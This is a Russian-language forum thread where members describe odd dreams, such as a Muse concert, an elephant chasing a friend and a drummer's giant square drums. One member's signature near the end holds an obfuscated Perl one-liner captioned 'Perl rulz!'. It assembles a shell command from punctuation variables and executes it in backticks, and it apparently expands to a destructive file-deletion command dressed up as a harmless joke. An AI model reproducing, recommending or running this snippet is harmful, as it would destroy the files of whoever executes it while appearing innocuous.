Пришло в голову начать тему,в которую пишем кому что снилось.Иногда снятся довольно весёлые и занятные вещи,поэтому я подумал может прокатит.Эротические сны описывать не обязательно. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Мне недавно снилось что я на концерте Muse, концерт почему-то в нашем Мухосранске. Солист резко останавливается и говорит что забыл акорды. Я ору "Аэм Дээм Йээм дибил" Он говорит Спасибо и продолжает играть. Я просыпаюсь _________________
Да нет.Я не в этом смысле.Свой сон я не помню,мне Крот свой рассказал.Спит значит Крот.Ему снится наша первая репетиция.Она проходит на поляне.Потом нам становится неудобно репетировать на поляне и мы переходим к Славику.Там крот начинает играть сначала на одной бочке,потом встаёт и приносит себе вторую.Тут он замечает,что бочки огромные и квадратные.Крот пытается играть и так,но не достаёт ногами до педалей.Тут Крот просыпается.Обнаруж,что ещё рано Крот идёт спать дальше.Снится ему Славик в виде гоблина,который обьясняет Кроту как лучше играть.Крот опять просыпается.Смотрит что всё ещё рано и опять идёт досыпать.Сниться Кроту какой-то человек,который говорит "с такими способностями тебе на экономический поступить раз плюнуть".Крот проснулся и решил больше не ложиться. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Снилась мне чушь:
я сидел в тюрьме,причем я сидел условно .
потом я был в школе,там все слушали Чоп Сьюи и мне от этого стало стрёмно,что типа все стали слушать систему.первокласникили пели вэйк ап ,мэйк ап хором.
потом я с мамой и отцом пошли рыбачить, мама была в поле,я был возле берега,отец ушел далеко рыбачить на болото(!),потом я пошёл к маме ,мы там с ней разговаривали и к нам подошёл пастух и спросил(на татарском) книжку почитать,я ему ответил(на татарском ) что нету ,мама на него ваще наорала,он ,не понимая ничего по-русски ,ушёл.Далее я искал нож ,на случай если нагрянут волки,и заметил ,что вокруг нас ведутся съёмки фильма "Троя". Пришёл отец,я взял у него спининг и пошёл рыбачить на болкон к Вадиму Галыгину.Потом снилась какая-то поебень и я проснулся(
Отлично,вообще!
Мне снилось чуток послабее и покороче.
Я был на берегу моря с моим другом туземцем.Потом прибежал слон.Туземец закричал,что это слон,который любит садиться и начал убегать от него.А слон стал за ним гоняться,всё норовя усесться своей огромной задницей на туземца.Потом туземец убежал за холм и слон за ним.Мой друг вскоре вернулся один и сказал,что ему удалось обхитрить слона.И только он собрался хвастаться тем,как он ловко может обманывать слонов,как из песка вылез носорог,превратился в слона и опять стал бегать за туземцем,пытаясь усесться на моего приятеля. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Сегодня снились не очень вещи.Сначала снилось,что я поругался с девчёнкойЮ,она выпила фанты и сразу успокоилаь.А потом снилось,что я зашёл на форум,а тут старый скин. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
мне снилось: я поехал в центр,искать объявления о продаже сальвии.Странным образом я оказался в травмпункте,будто бы у меня сломана левая рука,и я там весь сон ходил по этому травмпункту собирал всякие направления.Бюрократия ,короче.
С кем? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
а анечкой моей ненаглядной) я с ее акка заходил на форум когда у нее был чтобы потом не проебалить новые сообщения у меня на моем и нормально дома все посмотреть потом, короче нам понрава ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Я же говорил!Я ещё какой-нибйдь дряни с вечера поем,опилок там,кожуры бананово,воск погрызу и может мне ещё что-нибудь в этом духе приснится. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.